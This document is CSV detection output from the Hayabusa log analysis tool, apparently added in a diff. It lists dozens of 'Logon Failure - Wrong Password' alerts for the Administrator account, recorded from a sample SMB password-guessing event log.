+2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
